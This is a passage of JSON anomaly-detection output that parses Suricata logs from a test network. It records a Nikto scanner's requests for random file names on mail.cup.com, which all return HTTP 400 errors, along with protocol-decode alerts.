1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.eml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.203479+0000\",\"flow_id\":1094550924433338,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.203479, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1094550924433338,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.eml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.eml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.eml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.eml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46814, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1094550924433338,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1094550924433338, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.203479+0000\",\"flow_id\":1094550924433338,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46814,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.eml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.eml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.204806 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46816 -> 192.168.10.154:80", "/parser/model/time": 1583349514.204806, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46816, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.204806 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46816 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.backup", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.205030+0000\",\"flow_id\":733129426476444,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.20503, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":733129426476444,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.backup\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.backup\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.backup", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.backup", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46816, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":733129426476444,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 733129426476444, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.205030+0000\",\"flow_id\":733129426476444,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.206813 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46818 -> 192.168.10.154:80", "/parser/model/time": 1583349514.206813, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46818, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.206813 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46818 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.xls", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.207040+0000\",\"flow_id\":2162825255068915,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.20704, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2162825255068915,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.xls\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.xls\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.xls", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.xls", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46818, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2162825255068915,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2162825255068915, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.207040+0000\",\"flow_id\":2162825255068915,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", 